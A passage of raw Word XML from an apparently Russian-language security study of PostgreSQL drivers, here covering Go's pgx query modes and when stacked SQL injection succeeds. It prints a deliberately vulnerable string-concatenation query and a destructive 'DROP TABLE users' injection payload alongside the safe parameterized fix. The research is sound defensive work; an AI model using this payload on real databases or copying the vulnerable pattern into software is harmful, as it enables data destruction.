    <w:p w14:paraId="329CAC82" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R20 (sources/research.md, строки 328–330)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F92C7C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.5.5 pgx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D06DAE1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Setup.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pgx (актуальная major-версия v5, импорт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>github.com/jackc/pgx/v5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — нативный Go-драйвер для PostgreSQL, не на базе libpq. Реализует wire-protocol напрямую. Поведение определяется параметром </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>QueryExecMode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (per-connection или per-query), пять режимов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B07F5C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>QueryExecModeCacheStatement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r>
        <w:t>) — extended protocol с server-side prepared statement caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6CBFDD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>QueryExecModeCacheDescribe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>QueryExecModeDescribeExec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>QueryExecModeExec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — три вариации extended-protocol (с/без кэша, описание типов)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260962B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>QueryExecModeSimpleProtocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>simple query protocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с client-side substitution параметров</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511BFF3C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В четырёх extended-режимах стакинг блокирован сервером. В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SimpleProtocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pgx делает client-side экранирование значений (как pgjdbc-simple, как psycopg2) — значения через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> защищены экранированием, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри SQL-текста проходит. Переключение режима — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pgx.ConnConfig.DefaultQueryExecMode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или через connection string параметр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>default_query_exec_mode=simple_protocol</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1B7FF5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C08A7B4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name := r.URL.Query().Get("name")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03168C18" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rows, err := conn.Query(ctx,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1309372F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "SELECT id, email FROM users WHERE name = '"+name+"'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6396BDF9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Конкатенация в SQL-строку. Аргументов через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>...args</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после SQL нет — pgx отправляет строку как есть.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2902D745" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Безопасный код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D09356D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name := r.URL.Query().Get("name")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15537BC1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rows, err := conn.Query(ctx,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBF56FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "SELECT id, email FROM users WHERE name = $1", name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D78BA0B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — нативный placeholder PostgreSQL. Значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> идёт отдельным arg через wire (extended) или экранированно склеивается (simple).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B861030" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5127D342" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `name`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE0724D"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608DE051" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Путь 1: default mode (`CacheStatement`, extended) — Parse error на `;` в SQL-тексте.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE37671" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Даже уязвимый код выше с конкатенацией уходит как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Parse(query)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + пустой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bind</w:t>
      </w:r>
      <w:r>
        <w:t>. Сервер отвечает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A439FEC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: cannot insert multiple commands into a prepared statement (SQLSTATE 42601)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5AF686" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go-приложение получит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*pgconn.PgError</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с этим SQLSTATE. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Стакинг здесь не проходит даже при сырой конкатенации</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это сильная сторона pgx-default-mode и единственный драйвер из шести, где extended «по дефолту» полностью применяется даже без args.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB07210" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Уточнение: если разработчик правильно использовал </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + arg — то же самое плюс защита Bind-аргументом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F147B31" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Parse:   SELECT id, email FROM users WHERE name = $1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC70D85" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bind:    $1 = 'x''; DROP TABLE users; --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225E97F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Execute: 0 rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F785E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Путь 2: `QueryExecModeSimpleProtocol` — стакинг через конкатенацию проходит.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD83C0B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Connection config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15843F06" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>config, _ := pgx.ParseConfig("postgres://user:pass@host/db")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D729888" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>config.DefaultQueryExecMode = pgx.QueryExecModeSimpleProtocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00525A99" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conn, _ := pgx.ConnectConfig(ctx, config)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726A541B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>С тем же payload и уязвимым кодом сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7429764F"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75ACAF81" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Оба statement-а исполняются. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rows.Next()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пройдёт по первому result (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DROP TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> отработал тихо.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD5DCF9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если разработчик использовал </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + arg в simple-mode — pgx делает client-side экранирование, payload в значении превращается в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'x''; DROP TABLE users; --'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с удвоенной кавычкой) и остаётся буквальной строкой:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338B3910"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7F18F758" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Стакинга через значение нет. Уязвимость в simple-mode возникает только при конкатенации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD5F7AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Что отличает pgx от других драйверов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8BD335" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Default-mode наиболее строгий из шести</w:t>
      </w:r>
      <w:r>
        <w:t>: extended применяется к любому SQL-тексту, не только при наличии args. Это значит, что даже плохо написанный Go-код (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Query(ctx, "...; ...")</w:t>
      </w:r>
      <w:r>
        <w:t>) получает блокировку стакинга на сервере. У asyncpg, psycopg2/3, node-postgres «без args» = simple = уязвимо; у pgx-default «без args» = extended = не уязвимо.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413281FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Per-query режим</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: можно передать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pgx.QueryExecModeSimpleProtocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> третьим arg в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Query()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — точечно переключить один запрос. Это удобно для migrations, но создаёт ловушку, если применить в HTTP-обработчике.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B138F9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>server-side prepared statement cache</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>QueryExecModeCacheStatement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> каждый уникальный SQL-текст становится named prepared statement. Влияет на размер cache (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_cache_capacity</w:t>
      </w:r>
      <w:r>
        <w:t>, default 512), но не на безопасность.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE38A8A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Нет API для безопасных identifiers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — pgx предлагает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pgx.Identifier{schema, table}.Sanitize()</w:t>
      </w:r>
      <w:r>
